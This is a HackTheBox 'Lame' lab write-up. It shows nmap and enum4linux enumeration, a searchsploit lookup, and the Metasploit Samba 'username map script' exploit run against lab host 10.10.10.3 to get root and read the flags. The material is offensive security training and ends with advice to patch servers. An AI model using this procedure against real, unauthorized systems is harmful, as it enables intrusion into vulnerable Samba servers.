OS:Linux box difficulty:EASY

Scanning and Enumerating

As usual, let’s start with nmap:
$ nmap -sC -sV -oA lame 10.10.10.3 👀

Since this can sometimes take time and because it’s important to document, I save it to a file:
$ cat ~/Documents/nmap/lame.nmap

Trying Anonymous FTP

I tried logging in to FTP anonymously. The ftp package wasn’t installed so I had to install it:
$ apt install ftp

I was then able to log in successfully with the username: anonymous and password: password.
$ ftp 10.10.10.3

Once in I listed the contents $ ls -la and it doesn’t look promising because there are no files or directories listed.

Moving on to Samba

In the nmap scan I didn’t get an actual Samba version so I had to do a bit more enumeration on Samba specifically. I’ve never really messed with Samba so I Googled: ‘site: kali.org samba’ and found two tools: SMBMap and enum4linux. SMBMap didn’t give me any version numbers, so I tried:
$ enum4linux 10.10.10.3 and boom lame server (Samba 3.0.20-Debian) was in the results:

Now we can look for a Samba 3.0.20 exploit: $ searchsploit samba 3.0.20

I got: Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Com | exploits/unix/remote/16320.rb and a heap overflow exploit. ‘Username map script’ is a command execution attack and that sounds more straight forward than a heap overflow so I tried first.

Exploiting Samba with Metasploit

I tried the usual way for using an exploit with Metasploit
$ cp /usr/share/exploitdb/exploits/unix/remote/16320.rb /root/.msf4/modules/exploits/unix/remote

fired up Metasploit and ran the exploit

$ msfconsole
msf5 > use exploit/unix/remote/16320.rb
msf5 > set RHOST 10.10.10.3
msf5 > exploit

I was able to use the exploit, but I kept getting an error. 😕

Exploit failed: NameError undefined local variable or method `connect' for #[Msf:0x00005626cbd4fb50](msf:0x00005626cbd4fb50)

After a couple of tries I searched for an exploit in msf: search samba 3.0.20. It looks like Searchsploit had the wrong path, in Metasploit it’s at: exploit/multi/samba/usermap_script

So I try again

msf5 > use exploit/multi/samba/usermap_script
msf5 > set RHOST 10.10.10.3
msf5 > msf5 > exploit

And we have a successful ecploiy, I mean, exploit. \o/

Capture the Flags

Root Flag
whoami I’m root, nice.
Change to the root directory cd /root and there is the root flag.
Get the flag: $ cat root.txt

User Flag
Now let’s see if we can easily find that user flag: $ find / -name user.txt
That was simple: /home/makis/user.txt
Get the flag: $ cat /home/makis/user.txt

Takeaways

Sometimes the most obvious, possible vulnerability isn't the best route. Enumerate more.
Update your server software to avoid being vulnerable to easily exploitable bugs

HackTheBox Lame Writeup